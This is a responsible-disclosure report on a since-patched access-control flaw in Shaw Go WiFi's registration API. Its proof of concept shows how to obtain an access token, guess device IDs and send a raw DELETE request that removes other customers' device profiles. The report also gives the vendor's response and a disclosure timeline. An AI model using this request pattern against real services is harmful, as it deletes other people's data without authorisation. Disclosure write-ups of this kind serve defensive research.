This report was fully disclosed on 23 September 2018

Summary

By sending a DELETE request to a specific API location it is possible to arbitrarily delete Shaw Go Wifi device profiles from any account.

This attack requires some authentication. For the request to be successful an access_token needs to be generated either from an IP associated with any Shaw customer or by remotely logging into a @shaw.ca email. The access_token can be used to delete device profiles even if they are associated with another account.

Proof of Concept

We can generate access_token by visiting https://wifi-registration.shaw.ca/drp/ and inspecting the response from /api/token.

After generating an access_token we can send a delete request, replacing c15c0d06f00d with the device ID. The device ID is usually either the device MAC Address or 120100██████ with ██████ being a sequentially generated hexadecimal value.

Request:

DELETE /api/customer/devices/c15c0d06f00d HTTP/1.1
Host: wifi-registration.shaw.ca
Connection: close
Authorization: Bearer [access_token_redacted]
Content-Length: 26

Cookie:

[object Object]

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Aug 2018 13:37:00 GMT
Content-Type: application/json
Content-Length: 50
Connection: close
Set-Cookie: txGUID=████████-████-████-████-████████████; path=/; domain=shaw.ca
Set-Cookie: WiFiCaptivePortalDetails=[REDACTED]; path=/; expires=Fri, 10 Aug 2018 13:37:00 GMT; domain=shaw.ca
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Cache-Control: no-cache
Set-Cookie: captive_env=prod

{"response_time":"0.123s","v":"2.9.11-6.899e73c0"}

Some details in this response have been altered or redacted to ensure the privacy of the account owner.

  • Implement proper access controls.

Remediation Status

At the time of publishing this report using access_token generated by visiting https://wifi-registration.shaw.ca/drp/ now result in the response 412 Precondition Failed and {"code":242,"message":"Invalid Device - Missing from Account: 03161234567"}

Furthermore successful requests now show {"response_time":"0.123s","v":"2.9.12-1.4c02e4ac"} indicating the software version has been updated since.

Response From Affected Party

Response From [email protected] 23 Sept 2018

We would like to thank @glitchwitch for bringing this issue to our attention. As a result of this exercise, Shaw’s WiFi device management was able to make security advancements, and we consider this matter resolved.

Regards.

Shaw Customer Protection Team

E: [email protected]

This message is confidential and may contain privileged information. We ask that you not use or disclose this message other than with our consent.

If you are not an intended recipient, please immediately notify us and delete this message. Thank-you.

Timeline

  • 10 August 2018: Affected Party Notified
  • 23 September 2018: Affected Party Released Patch (+44 days)
  • 23 September 2018: Report Published (+44 days)